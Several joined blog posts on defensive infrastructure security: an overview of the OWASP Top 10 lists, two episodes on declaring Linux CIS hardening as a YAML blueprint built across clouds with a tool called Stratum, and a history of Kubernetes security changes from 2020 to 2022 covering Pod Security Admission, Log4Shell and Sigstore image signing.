The original. HTTP-layer attacks on server-rendered or API-backed apps. A01 Broken Access Control through A10 SSRF. Still the baseline for any web-facing application.

OWASP API Security Top 10 (2023)
REST and GraphQL-specific. Broken Object Level Authorization (BOLA/IDOR), excessive data exposure, mass assignment, unrestricted resource consumption. API attacks account for the majority of cloud breaches — this list exists because the web app list missed API-specific attack surfaces.

OWASP Cloud-Native Application Security Top 10
Kubernetes, containers, orchestration-layer risks: insecure workload configurations, misconfigured cloud storage, vulnerable container images, runtime compromise. The cloud-infra angle.

OWASP Top 10 for LLM Applications (2025)
The list this series is built on. Prompt injection, model poisoning, supply chain risks for model artifacts, RAG database attacks, autonomous agent over-permission. The attack surfaces that arrive when you embed a language model in your infrastructure.

The full comparison — which list applies to which part of your architecture, and how they overlap — is in the next episode.


Why AI Arrived at OWASP

The OWASP Top 10 for LLM Applications was not invented top-down. It came from practitioners who were deploying language models and cataloguing the breach patterns they were seeing.

The first version (v1.0) shipped in August 2023, driven by a working group that formed in May 2023 — roughly six months after ChatGPT created widespread LLM deployment. The timeline matters: security researchers were finding real vulnerabilities in production systems in real time, and the OWASP list was the community’s way of documenting the emerging threat model before it became a liability.

Version 2.0 shipped in November 2024. Two entirely new categories — System Prompt Leakage (LLM07) and Vector/Embedding Weaknesses (LLM08) — were added because RAG-based applications and agentic AI had become prevalent enough that their specific attack surfaces warranted dedicated treatment. Sensitive Information Disclosure moved from #6 to #2 because real breach data, not theory, showed it was the second most commonly exploited category.

The OWASP AI Exchange — a parallel OWASP project — went further. It produced a 300-page technical guide on AI security and privacy and contributed directly to the EU AI Act’s technical requirements. As of 2025, the EU AI Act for high-risk AI systems references risk assessment requirements that align directly with OWASP LLM Top 10 categories. OWASP is still not a compliance standard. But for AI systems in the EU, ignoring it is no longer a neutral choice.


⚠ Production Gotchas

“OWASP is a checklist you run once”
It’s a living document updated every 3–4 years based on actual breach data. The 2021 web app list is not the same document as the 2017 list. The 2025 LLM list has different categories than the 2023 v1 list. Running the 2017 checklist on a 2025 system is not OWASP compliance — it is a false sense of coverage.

“We are OWASP compliant”
OWASP is not a compliance standard. There is no OWASP certification, no OWASP audit, no OWASP controls framework. Organizations that say “we are OWASP compliant” mean they have reviewed the list and addressed the categories — that is a risk reduction exercise, not a regulatory state. The EU AI Act is a compliance standard. NIST AI RMF is a compliance framework. OWASP is the technical operationalization of both.

“The LLM Top 10 only matters if you’re building LLMs”
You don’t need to build LLMs for the list to apply. If you are deploying a chatbot powered by a third-party API, using an AI coding assistant that has access to your codebase, or running a RAG application that indexes internal documents — you are within scope of LLM01 through LLM10. The attack surface is the integration, not the model itself.


Quick Reference: OWASP Top 10 Versions

Year Version Key Additions Key Removals Architectural Context
2003 v1.0 Injection, Broken Auth, XSS, Insecure Config Monolithic web apps, dynamic SQL
2007 v2.0 CSRF, Insecure Comms Unvalidated Input → merged HTTPS gap, session theft
2010 v3.0 Unvalidated Redirects Phishing via redirectors
2013 v4.0 Missing Function-Level Access CSRF moved to lower priority API patterns emerging
2017 v5.0 XXE, Insecure Deserialization, Logging Failures Unvalidated Redirects Microservices, detection gaps
2021 v6.0 Insecure Design, SSRF XSS merged into Injection Attack class abstraction; cloud/AI applicability

Current parallel lists:

List Last Updated Primary Surface Key Org
Web App Top 10 2021 HTTP/web apps OWASP
API Security Top 10 2023 REST/GraphQL APIs OWASP
Cloud-Native App Security Top 10 2022 K8s/containers OWASP
LLM Applications Top 10 2025 (v2.0) Language models/AI OWASP GenAI

Framework Alignment

Framework Relevant Function Connection to OWASP History
NIST CSF 2.0 IDENTIFY (ID.RA) OWASP is the community risk catalog that feeds asset risk assessments
ISO 27001:2022 A.8.8 (vulnerability management) OWASP Top 10 is the standard reference for vulnerability class coverage
NIST AI RMF MAP 1.5 Identify which risk categories from OWASP LLM Top 10 apply to specific system components
EU AI Act Art. 9 (risk management system) High-risk AI system risk assessments reference OWASP AI Exchange technical guidance

Key Takeaways

  • OWASP Top 10 history is the story of attack surfaces expanding — web to API to cloud to AI — with the same failure classes appearing at each layer
  • The 2021 abstraction to attack classes (not web-specific techniques) was the architectural decision that made OWASP applicable everywhere, including LLMs
  • Four lists exist today; real systems touch multiple lists simultaneously
  • The LLM Top 10 (v2.0, 2025) is not theoretical — it was built from documented production breach patterns, and v2.0 added new categories because RAG and agentic AI created new attack surfaces fast enough to warrant them
  • OWASP is a risk framework, not a compliance standard — until 2025, when the EU AI Act began referencing OWASP AI Exchange guidance for high-risk AI systems

What’s Next

EP02 answers the navigation question this episode raises: if four OWASP lists exist, which one applies to your system — and what happens when a single architecture touches all four at once?

The Four OWASP Lists: Web App, API, Cloud-Native, and LLM Compared →

Get EP02 in your inbox when it publishes → subscribe

One Blueprint, Six Clouds — Multi-Provider OS Image Builds

Reading Time: 6 minutes

OS Hardening as Code, Episode 3
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening**


TL;DR

  • Multi-cloud OS hardening with separate scripts per provider means three scripts that drift within weeks
  • A HardeningBlueprint YAML separates compliance intent (portable) from provider details (handled by Stratum’s provider layer)
  • The same blueprint builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox with a single --provider flag change
  • Provider-specific differences — disk names, cloud-init ordering, metadata endpoint IPs — are abstracted away from the blueprint author
  • One YAML file becomes the single source of truth for OS security posture across your entire fleet, regardless of cloud
  • Drift detection works fleet-wide: rescan any instance against the original blueprint grade on any provider

The Problem: Three Clouds, Three Scripts, Three Ways to Drift

AWS hardening script          GCP hardening script          Azure hardening script
├── /dev/xvd* disk refs       ├── /dev/sda* disk refs       ├── /dev/sda* disk refs
├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS
├── cloud-init order A        ├── cloud-init order B        ├── cloud-init order C
└── Updated: Jan 2025         └── Updated: Aug 2024         └── Updated: Mar 2024
                                         │
                                         └─ 5 months behind
                                            on CIS updates

Multi-cloud OS hardening starts as a copy-paste of the AWS script. Within a month, the clouds diverge.

EP02 showed that a HardeningBlueprint YAML eliminates the skip-at-2am problem by making hardening a build artifact. What it assumed — quietly — is that you’re building for one provider. The moment you expand to a second cloud, the provider-specific details in the blueprint become a problem: disk names differ, cloud-init fires in a different order, and AWS-specific assumptions break silently on GCP.


We expanded from AWS to GCP six months ago. The EC2 hardening script had been working reliably for over a year. The GCP engineer took the AWS script, made some quick changes, and started building images.

The first GCP images had a subtle problem: the /tmp and /home separate partition entries in /etc/fstab referenced /dev/xvdb — an AWS disk naming convention. GCP uses /dev/sdb. The fstab entries were silently ignored. The mounts existed but weren’t restricted. The CIS controls for separate filesystem partitions were listed as passing in the scan output because the Ansible task had “run successfully” — it just hadn’t done what we thought.

It took a pentest three months later to catch it. The finding: six production GCP instances with /tmp not mounted with noexec, nosuid, nodev — despite our “CIS L1 hardened” label.

The root cause wasn’t the engineer. It was a hardening approach that required cloud-specific knowledge embedded in the script rather than in a provider abstraction layer.


How Stratum Separates Compliance Intent from Provider Details

Multi-cloud OS hardening works when the compliance intent and the provider details are kept strictly separate.

HardeningBlueprint YAML
(compliance intent — portable)
         │
         ▼
  Stratum Provider Layer
  ┌─────────────────────────────────────────────┐
  │  AWS         │  GCP         │  Azure        │
  │  /dev/xvd*   │  /dev/sda*   │  /dev/sda*    │
  │  IMDS v2     │  GCP IMDS    │  Azure IMDS   │
  │  cloud-init  │  cloud-init  │  waagent       │
  │  order A     │  order B     │  order C       │
  └─────────────────────────────────────────────┘
         │
         ▼
  Ansible-Lockdown + Provider-Aware Configuration
         │
         ▼
  OpenSCAP Scan
         │
         ▼
  Golden Image (AMI / GCP Image / Azure Image)

The blueprint author declares what should be true about the OS. Stratum’s provider layer handles how that’s achieved on each cloud.

The disk naming, cloud-init sequencing, metadata endpoint configuration, and provider-specific package repositories are all abstracted into the provider layer. They never appear in the blueprint file.


The Same Blueprint Across Six Providers

# Build the same baseline on three clouds
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
stratum build --blueprint ubuntu22-cis-l1.yaml --provider gcp
stratum build --blueprint ubuntu22-cis-l1.yaml --provider azure

# The other three supported providers
stratum build --blueprint ubuntu22-cis-l1.yaml --provider digitalocean
stratum build --blueprint ubuntu22-cis-l1.yaml --provider linode
stratum build --blueprint ubuntu22-cis-l1.yaml --provider proxmox

The blueprint file is identical across all six. The output — AMI, GCP machine image, Azure managed image — is equivalent in terms of security posture. The same 144 CIS L1 controls apply. The same OpenSCAP scan runs. The same grade lands in the image metadata.

If you change the blueprint — add a control, update the Ansible role version, add a custom audit logging configuration — you rebuild all providers from the same source and all images come out consistent.


What the Provider Layer Handles

The provider layer is where the cloud-specific knowledge lives, so the blueprint author doesn’t have to carry it:

Disk naming:

Provider OS disk Ephemeral Data
AWS /dev/xvda /dev/xvdb /dev/xvdc+
GCP /dev/sda /dev/sdb+
Azure /dev/sda /dev/sdb (temp disk) /dev/sdc+
DigitalOcean /dev/vda /dev/vdb+

The CIS controls for separate /tmp and /home partitions reference disk paths that differ across these providers. The provider layer translates the blueprint’s filesystem.tmp declaration into the correct fstab entries for the target cloud.

Cloud-init ordering:

Different providers initialize services in different orders. On AWS, the network is available before cloud-init runs most tasks. On GCP, some network configuration happens after cloud-init starts. On Azure, the waagent handles some configuration that cloud-init handles elsewhere.

The provider layer sequences the hardening steps to run in the correct order for each provider — specifically, it waits for network availability before applying network-level hardening, and ensures the package manager is configured before running Ansible roles that require package installation.

Metadata endpoint configuration:

CIS controls include restrictions on access to the instance metadata service (IMDSv2 enforcement on AWS, equivalent controls on GCP/Azure). The provider layer applies the correct restriction for each cloud — the blueprint just declares compliance: benchmark: cis-l1.


Building for All Providers Simultaneously

For fleet standardization, you can build all providers in a single operation:

# Build for all providers in parallel
stratum build \
  --blueprint ubuntu22-cis-l1.yaml \
  --provider aws,gcp,azure

# Output:
# [aws]   Launching build instance in ap-south-1...
# [gcp]   Launching build instance in asia-south1...
# [azure] Launching build instance in southindia...
# ...
# [aws]   Grade: A (98/100) — ami-0a7f3c9e82d1b4c05
# [gcp]   Grade: A (98/100) — projects/my-project/global/images/ubuntu22-cis-l1-20260419
# [azure] Grade: A (98/100) — /subscriptions/.../images/ubuntu22-cis-l1-20260419

All three builds run in parallel. All three images carry identical compliance grades. The image names embed the date and grade for easy identification.


Blueprint Versioning and Drift Detection

Version-controlling the blueprint file solves a problem that multi-cloud environments hit consistently: knowing what your OS security posture was six months ago.

# Check the current state of a fleet instance against the blueprint
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Compare against original build grade
# Output:
# Instance: i-0abc123 (aws, ap-south-1)
# Original grade (build): A (98/100) — 2026-01-15
# Current grade (scan):   B (89/100) — 2026-04-19
# 
# Drifted controls (9):
#   3.3.2  — TCP SYN cookies: FAIL (sysctl net.ipv4.tcp_syncookies=0)
#   5.3.2  — sudo log_input: FAIL (removed from /etc/sudoers.d/)
#   ...

Drift detection compares the current instance state against the blueprint that built it. Controls that passed at build time and now fail indicate configuration drift — something changed after the image was deployed. This is how you find the three instances that a sysadmin “temporarily” modified and never reverted.


Production Gotchas

Provider-specific CIS controls exist. CIS AWS Foundations Benchmark and CIS GCP Benchmark include cloud-specific controls (VPC flow logs, CloudTrail, etc.) that are separate from the OS-level CIS controls. The blueprint handles OS-level controls. Cloud-level controls (IAM, logging, network configuration) belong in your cloud security posture management tooling.

Build costs vary by provider. On AWS, the build instance is a t3.medium for 15–20 minutes (~$0.02). On GCP and Azure, equivalent pricing applies. For multi-provider builds, run them in regions close to your primary workloads to minimize image transfer time.

Proxmox builds require a local Stratum agent. Unlike cloud providers, Proxmox doesn’t have an API that Stratum can reach from outside. The Proxmox provider requires the Stratum agent running on the Proxmox host. The build process and blueprint format are identical; only the network topology differs.

GCP image sharing across projects requires explicit IAM. GCP machine images aren’t automatically available to other projects in the organization. After building, run stratum image share --provider gcp --image ubuntu22-cis-l1-20260419 --projects

or configure sharing at the organization level.


Key Takeaways

  • Multi-cloud OS hardening with separate scripts per provider creates inevitable drift; a provider-abstracted blueprint eliminates it
  • The same HardeningBlueprint YAML builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox — the compliance intent is in the file, the provider details are in Stratum’s provider layer
  • Parallel multi-provider builds produce images with identical compliance grades on the same schedule
  • Drift detection works fleet-wide: any instance on any provider can be rescanned against the blueprint that built it
  • Blueprint version control is the single source of truth for OS security posture history — what was true on any given date, across any provider

What’s Next

One blueprint, six clouds, identical compliance grades. EP03 showed that the multi-cloud drift problem disappears when provider details are abstracted away from the blueprint.

What neither EP02 nor EP03 answered is the auditor’s question: how do you know the image is actually compliant? “We ran CIS L1” is not an answer. “Grade A, 98/100 controls, SARIF export attached” is.

EP04 covers automated OpenSCAP compliance: the post-build scan in detail — how the A-F grade is calculated, what controls block an A grade, how SARIF exports work, and how drift detection catches what changed after deployment.

Next: automated OpenSCAP compliance — CIS benchmark grading before deployment

Get EP04 in your inbox when it publishes → linuxcent.com/subscribe

Hardening Blueprint as Code — Declare Your OS Baseline in YAML

Reading Time: 6 minutes

OS Hardening as Code, Episode 2
Cloud AMI Security Risks · Linux Hardening as Code**


TL;DR

  • A hardening runbook is a list of steps someone runs. A HardeningBlueprint YAML is a build artifact — if it wasn’t applied, the image doesn’t exist
  • Linux hardening as code means declaring your entire OS security baseline in a single YAML file and building it reproducibly across any provider
  • stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws either produces a hardened image or fails — there is no partial state
  • The blueprint includes: target OS/provider, compliance benchmark, Ansible roles, and per-control overrides with documented reasons
  • One blueprint file = one source of truth for your hardening posture, version-controlled and reviewable like any other infrastructure code
  • Post-build OpenSCAP scan runs automatically — the image only snapshots if it passes

The Problem: A Runbook That Gets Skipped Once Is a Runbook That Gets Skipped

Hardening runbook
       │
       ▼
  Human executes
  steps manually
       │
       ├─── 47 deployments: followed correctly
       │
       └─── 1 deployment at 2am: step 12 skipped
                    │
                    ▼
           Instance in production
           without audit logging,
           SSH password auth enabled,
           unnecessary services running

Linux hardening as code eliminates the human decision point. If the blueprint wasn’t applied, the image doesn’t exist.

EP01 showed that default cloud AMIs arrive pre-broken — unnecessary services, no audit logging, weak kernel parameters, SSH configured for convenience not security. The obvious response is a hardening script. But a script run by a human is still a process step. It can be skipped. It can be done halfway. It can drift across different engineers who each interpret “run the hardening script” slightly differently.


A production deployment last year. The platform team had a solid CIS L1 hardening runbook — 68 steps, well-documented, followed consistently. Then a critical incident at 2am required three new instances to be deployed on short notice. The engineer on call ran the provisioning script and, under pressure, skipped the hardening step with the intention of running it the next morning.

They didn’t. The three instances stayed in production unhardened for six weeks before an automated scan caught them. Audit logging wasn’t configured. SSH was accepting password authentication. Two unnecessary services were running that weren’t in the approved software list.

Nothing was breached. But the finding went into the next compliance report as a gap, the team spent a week remediating, and the post-mortem conclusion was “we need better runbook discipline.”

That’s the wrong conclusion. The runbook isn’t the problem. The problem is that hardening was a process step instead of a build constraint.


What Linux Hardening as Code Actually Means

Linux hardening as code is the same principle as infrastructure as code applied to OS security posture: the desired state is declared in a file, the file is the source of truth, and the execution is deterministic and repeatable.

HardeningBlueprint YAML
         │
         ▼
  stratum build
         │
  ┌──────┴──────────────────┐
  │  Provider Layer          │
  │  (cloud-init, disk       │
  │   names, metadata        │
  │   endpoint per provider) │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  Ansible-Lockdown        │
  │  (CIS L1/L2, STIG —      │
  │   the hardening steps)   │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  OpenSCAP Scanner        │
  │  (post-build verify)     │
  └──────┬──────────────────┘
         │
         ▼
  Golden Image (AMI/GCP image/Azure image)
  + Compliance grade in image metadata

The YAML file is what you write. Stratum handles the rest.


The HardeningBlueprint YAML

The blueprint is the complete, auditable declaration of your OS security posture:

# ubuntu22-cis-l1.yaml
name: ubuntu22-cis-l1
description: Ubuntu 22.04 CIS Level 1 baseline for production workloads
version: "1.0"

target:
  os: ubuntu
  version: "22.04"
  provider: aws
  region: ap-south-1
  instance_type: t3.medium

compliance:
  benchmark: cis-l1
  controls: all

hardening:
  - ansible-lockdown/UBUNTU22-CIS
  - role: custom-audit-logging
    vars:
      audit_log_retention_days: 90
      audit_max_log_file: 100

filesystem:
  tmp:
    type: tmpfs
    options: [nodev, nosuid, noexec]
  home:
    options: [nodev]

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"
  - id: 5.2.4
    override: compliant
    reason: "SSH timeout managed by session manager policy, not sshd_config"

Each section is explicit:

target — which OS, which version, which provider. This is the only provider-specific section. The compliance intent below it is portable.

compliance — which benchmark and which controls to apply. controls: all means every CIS L1 control. You can also specify controls: [1.x, 2.x] to scope to specific sections.

hardening — which Ansible roles to run. ansible-lockdown/UBUNTU22-CIS is the community CIS hardening role. You can add custom roles alongside it.

controls — documented exceptions. Not suppressions — overrides with a recorded reason. This is the difference between “we turned off this control” and “this control is satisfied by an equivalent implementation, documented here.”


Building the Image

# Validate the blueprint before building
stratum blueprint validate ubuntu22-cis-l1.yaml

# Build — this will take 15-20 minutes
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws

# Output:
# [15:42:01] Launching build instance...
# [15:42:45] Running ansible-lockdown/UBUNTU22-CIS (144 tasks)...
# [15:51:33] Running custom-audit-logging role...
# [15:52:11] Running post-build OpenSCAP scan (benchmark: cis-l1)...
# [15:54:08] Grade: A (98/100 controls passing)
# [15:54:09] 2 controls overridden (documented in blueprint)
# [15:54:10] Creating AMI snapshot: ami-0a7f3c9e82d1b4c05
# [15:54:47] Done. AMI tagged with compliance grade: cis-l1-A-98

If the post-build scan comes back below a configurable threshold, the build fails — no AMI is created. The instance is terminated. The image does not exist.

That is the structural guarantee. You cannot skip a build step at 2am because at 2am you’re calling stratum build, not running steps manually.


The Control Override Mechanism

The override mechanism is what separates this from checkbox compliance.

Every security benchmark has controls that conflict with how production environments actually work. CIS L1 recommends /tmp on a separate partition. Many cloud instances use tmpfs with equivalent nodev, nosuid, noexec mount options. The intent of the control is satisfied. The literal implementation differs.

Without an override mechanism, you have two bad options: fail the scan (noisy, meaningless), or configure the scanner to ignore the control (undocumented, invisible to auditors).

The blueprint’s controls section gives you a third option: record the override, document the reason, and let the scanner count it as compliant. The SARIF output and the compliance grade both reflect the documented state.

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"

This appears in the build log, in the SARIF export, and in the image metadata. An auditor reading the output sees: control 1.1.2 — compliant, documented exception, reason recorded. Not: control 1.1.2 — ignored.


What the Blueprint Gives You That a Script Doesn’t

Hardening script HardeningBlueprint YAML
Version-controlled Possible but not enforced Always — it’s a file
Auditable exceptions Typically not Built-in override mechanism
Post-build verification Manual or none Automatic OpenSCAP scan
Image exists only if hardened No Yes — build fails if scan fails
Multi-cloud portability Requires separate scripts Provider flag, same YAML
Drift detection Not possible Rescan instance against original grade
Skippable at 2am Yes No — you’d have to change the build process

The last row is the one that matters. A script is skippable because there’s a human in the loop. A blueprint is a build artifact — you can’t deploy the image without the blueprint having been applied, because the image is what the blueprint produces.


Validating a Blueprint Before Building

# Syntax and schema validation
stratum blueprint validate ubuntu22-cis-l1.yaml

# Dry-run — show what Ansible tasks will run, what controls will be checked
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws --dry-run

# Show all available controls for a benchmark
stratum blueprint controls --benchmark cis-l1 --os ubuntu --version 22.04

# Show what a specific control checks
stratum blueprint controls --id 1.1.2 --benchmark cis-l1

The dry-run output shows every Ansible task that will run, every OpenSCAP check that will fire, and flags any controls that might conflict with the provider environment before you’ve launched a build instance.


Production Gotchas

Build time is 15–25 minutes. Ansible-Lockdown applies 144+ tasks for CIS L1. Build this into your pipeline timing — don’t expect golden images in 3 minutes.

Cloud-init ordering matters. On AWS, certain hardening steps (sysctl tuning, PAM configuration) interact with cloud-init. The Stratum provider layer handles sequencing — but if you add custom hardening roles, test the cloud-init interaction explicitly.

Some CIS controls conflict with managed service requirements. AWS Systems Manager Session Manager requires specific SSH configuration. RDS requires specific networking settings. Use the controls override section to document these — don’t suppress them silently.

Kernel parameter hardening requires a reboot. Controls in the 3.x (network parameters) and 1.5.x (kernel modules) sections apply sysctl changes that take effect on reboot. The Stratum build process reboots the instance before the OpenSCAP scan — don’t skip the reboot if you’re building manually.


Key Takeaways

  • Linux hardening as code means the blueprint YAML is the build artifact — the image either exists and is hardened, or it doesn’t exist
  • The controls override mechanism is the difference between undocumented suppressions and auditable, reasoned exceptions
  • Post-build OpenSCAP scan runs automatically — a failing grade blocks image creation
  • One blueprint file is portable across providers (EP03 covers this): the compliance intent stays in the YAML, the cloud-specific details go in the provider layer
  • Version-controlling the blueprint gives you a complete history of what your OS security posture was at any point in time — the same way Terraform state tracks infrastructure

What’s Next

One blueprint, one provider. EP02 showed that the skip-at-2am problem is solved when hardening is a build artifact rather than a process step.

What it didn’t address: what happens when you expand to a second cloud. GCP uses different disk names. Azure cloud-init fires in a different order. The AWS metadata endpoint IP is different from every other provider. If you maintain separate hardening scripts per cloud, they drift within a month.

EP03 covers multi-cloud OS hardening: the same blueprint, six providers, no drift.

Next: multi-cloud OS hardening — one blueprint for AWS, GCP, and Azure

Get EP03 in your inbox when it publishes → linuxcent.com/subscribe

Security Hardens: Supply Chain, Pod Security, and the API Cleanup (2020–2022)

Reading Time: 6 minutes


Introduction

The 2020–2022 period redefined what “secure Kubernetes” meant. A global pandemic moved workloads to cloud-native infrastructure faster than security practices could follow. SolarWinds happened. Log4Shell happened. The software supply chain became a crisis.

At the same time, the Kubernetes project was doing something it had been reluctant to do: removing APIs and features, including PodSecurityPolicy — the primary security primitive that most enterprise clusters depended on. The replacement was simpler, but the migration was not.


Kubernetes 1.19 — LTS Behavior, Ingress Stable (August 2020)

1.19 extended the support window to one year (from nine months). This was an acknowledgment that enterprise organizations couldn’t upgrade four times per year — a common complaint from operations teams.

  • Ingress graduated to stable: networking.k8s.io/v1 — after years as a beta resource, Ingress finally had a stable API
  • Immutable ConfigMaps and Secrets to beta: Configuration protection becomes broadly available
  • EndpointSlices to GA: The replacement for Endpoints — shards pod-to-service mappings to avoid the single large Endpoints object that caused control plane stress at scale (10,000+ endpoints for a single service)
  • Structured logging (alpha): Machine-parseable log output from Kubernetes control plane components — a prerequisite for reliable SIEM integration
# EndpointSlice: distributed representation of service endpoints
kubectl get endpointslices -n production -l kubernetes.io/service-name=api-service
NAME                  ADDRESSTYPE   PORTS   ENDPOINTS                                   AGE
api-service-abc12     IPv4          8080    10.0.1.5,10.0.1.6,10.0.1.7 + 47 more...   2d
api-service-def34     IPv4          8080    10.0.2.1,10.0.2.2,10.0.2.3 + 47 more...   2d

Kubernetes 1.20 — Dockershim Deprecated (December 2020)

The announcement in 1.20 that the Docker shim was deprecated caused more panic than any previous Kubernetes deprecation. The message was misread by many as “Kubernetes is dropping Docker support” — the PR catastrophe that followed required the Kubernetes blog to publish a dedicated clarification post.

The reality: Docker-built images continued to work on Kubernetes. What was being removed was the code in the kubelet that talked directly to Docker’s daemon using a non-standard interface, rather than through the Container Runtime Interface (CRI). Docker images conform to the OCI (Open Container Initiative) image specification — they run on any CRI-compliant runtime.

The migration path:
containerd: The runtime that Docker itself used internally. Moving to containerd meant removing the Docker layer entirely — the kubelet talks directly to containerd via CRI
CRI-O: An OCI-focused runtime designed specifically for Kubernetes, minimal and purpose-built

# Before (Docker socket): kubelet → dockershim → Docker daemon → containerd → runc
# After (direct CRI):     kubelet → containerd → runc
#                    or:  kubelet → CRI-O → runc

# Check runtime in use on a node
kubectl get node worker-1 -o jsonpath='{.status.nodeInfo.containerRuntimeVersion}'
# containerd://1.6.4

Also in 1.20:
API Priority and Fairness beta: Rate-limit API server requests by priority — prevents a runaway controller from starving other API clients
CronJobs stable: Scheduled jobs graduate after years in beta
Volume snapshot stable


The SolarWinds Context (December 2020)

The SolarWinds supply chain attack, disclosed in December 2020, didn’t directly target Kubernetes. But it accelerated an existing conversation in the cloud-native community: if the build pipeline is compromised, signed binaries mean nothing. If the image registry is compromised, admission control on image names means nothing.

The attack catalyzed work on several fronts:
Sigstore: An open-source project (Google, Red Hat, Purdue University) for signing and verifying software artifacts including container images
SLSA (Supply chain Levels for Software Artifacts): A framework for incrementally improving supply chain security, from basic build provenance to hermetic builds with verified dependencies
SBOM (Software Bill of Materials): A machine-readable inventory of software components in an image — required by US Executive Order 14028 (May 2021) for software sold to the federal government


Kubernetes 1.21 — PodSecurityPolicy Deprecation (April 2021)

PodSecurityPolicy was deprecated in 1.21, announcing its removal in 1.25. The deprecation was contentious — PSP was the only built-in mechanism for enforcing pod security constraints, and every security-conscious cluster depended on it, despite its many flaws.

The replacement approach: Pod Security Standards — three predefined security profiles:

Profile Description Use Case
Privileged No restrictions System-level workloads, trusted components
Baseline Prevents known privilege escalations General application workloads
Restricted Hardened; follows current best practices High-security workloads

Other 1.21 highlights:
CronJobs stable
Immutable ConfigMaps and Secrets stable
Graceful node shutdown beta: The kubelet gracefully terminates pods when a node shuts down (not just when the kubelet stops)
PodDisruptionBudget stable


Kubernetes 1.22 — The Great API Removal (August 2021)

1.22 was the most disruptive Kubernetes release for operations teams since 1.0. Several long-lived beta APIs were removed:

Removed API Replacement Used By
networking.k8s.io/v1beta1 Ingress networking.k8s.io/v1 Every ingress resource
batch/v1beta1 CronJob batch/v1 Every scheduled job
apiextensions.k8s.io/v1beta1 CRD apiextensions.k8s.io/v1 Every CRD definition
rbac.authorization.k8s.io/v1beta1 rbac.authorization.k8s.io/v1 RBAC resources

Teams with Helm charts, Terraform modules, and CI/CD pipelines built against beta API versions had to update their manifests. This was the moment that finally drove home the message: beta APIs in Kubernetes are not stable — they will be removed.

Also in 1.22:
Server-Side Apply stable: Apply semantics moved server-side — field ownership tracking, conflict detection, and merge strategies are handled by the API server rather than client-side kubectl
Memory manager stable: Better NUMA-aware memory allocation for latency-sensitive workloads
Bound Service Account Token Volumes stable: Time-limited, audience-bound tokens for pods — replacing the long-lived, cluster-wide service account tokens that were a persistent security concern

# Bound service account token — expires, audience-restricted
# Projected volume mounts a time-limited token (default 1h expiry)
volumes:
- name: token
  projected:
    sources:
    - serviceAccountToken:
        audience: api
        expirationSeconds: 3600
        path: token

The bound token change was significant from a security perspective: previously, a service account token extracted from a pod would be valid indefinitely, for any audience. Projected tokens expire and are tied to a specific audience.


Pod Security Admission (Kubernetes 1.22, GA in 1.25)

The replacement for PodSecurityPolicy was Pod Security Admission — an admission controller built into the API server (no webhook required) that enforces the three Pod Security Standards at the namespace level:

# Namespace-level security enforcement
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: v1.25
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: v1.25

The three modes:
enforce: Reject pods that violate the policy
audit: Allow the pod but add an audit annotation
warn: Allow the pod and send a warning to the client

Pod Security Admission is deliberately simpler than PSP. It does less — it enforces three fixed profiles, not arbitrary rules. For arbitrary policy, you still need OPA/Gatekeeper or Kyverno. But the simplicity means it works reliably, with no authorization edge cases.


Kubernetes 1.23 — Dual-Stack Stable, HPA v2 Stable (December 2021)

  • IPv4/IPv6 dual-stack stable: Pods and Services can have both IPv4 and IPv6 addresses — critical for organizations running mixed-stack networks or migrating from IPv4 to IPv6
  • HPA v2 stable: Horizontal Pod Autoscaler with support for multiple metrics (CPU, memory, custom metrics from Prometheus, external metrics). Scale on Prometheus metrics, not just CPU:
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: api-hpa
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api
  minReplicas: 2
  maxReplicas: 20
  metrics:
  - type: Pods
    pods:
      metric:
        name: http_requests_per_second
      target:
        type: AverageValue
        averageValue: 1000m
  • FlexVolume deprecated (in favor of CSI): Another step in the driver out-of-tree migration

The Log4Shell Moment (December 2021)

Log4Shell (CVE-2021-44228) hit on December 9, 2021. The vulnerability allowed unauthenticated remote code execution in any Java application using Log4j 2.x. The blast radius was enormous — Log4j was in everything.

For Kubernetes operators, Log4Shell crystallized several operational realities:

Inventory problem: Do you know which of your pods is running a Java application? Do you know which version of Log4j it includes? Without an SBOM pipeline and admission-time image scanning, you probably don’t have a reliable answer.

Patch velocity problem: Once you know which images are vulnerable, how quickly can you rebuild and redeploy? Organizations with GitOps pipelines and image update automation (Flux’s image reflector, ArgoCD Image Updater) could respond in hours. Organizations without this infrastructure measured response time in days.

Runtime detection problem: Can you detect exploitation attempts in real time? Falco rules for Log4Shell JNDI lookup patterns were available within hours of disclosure — but only organizations already running Falco could use them.

Log4Shell made the case for supply chain security, image scanning, SBOM generation, and runtime detection tooling more effectively than any conference talk.


Sigstore and the Supply Chain Response

In 2021, Sigstore reached a point where its tooling — cosign (image signing), rekor (transparency log), fulcio (keyless signing via OIDC) — was production-ready.

The keyless signing model was significant: instead of managing long-lived signing keys (which themselves become a supply chain risk), fulcio issues short-lived certificates tied to an OIDC identity (a GitHub Actions workflow, a GitLab CI job). The signature proves that a specific workflow built the image.

# Sign an image as part of CI (keyless, OIDC-based)
cosign sign --yes ghcr.io/org/app:v1.0.0

# Verify before deploying
cosign verify \
  --certificate-identity-regexp "https://github.com/org/app/.github/workflows/build.yml" \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
  ghcr.io/org/app:v1.0.0

Policy engines (OPA/Gatekeeper, Kyverno) could be configured to reject pods using unsigned or unverified images at admission time — closing the loop from build provenance to runtime enforcement.


Key Takeaways

  • Dockershim deprecation in 1.20 was about removing the non-standard interface, not about dropping Docker image compatibility — containers built with Docker run on containerd or CRI-O without changes
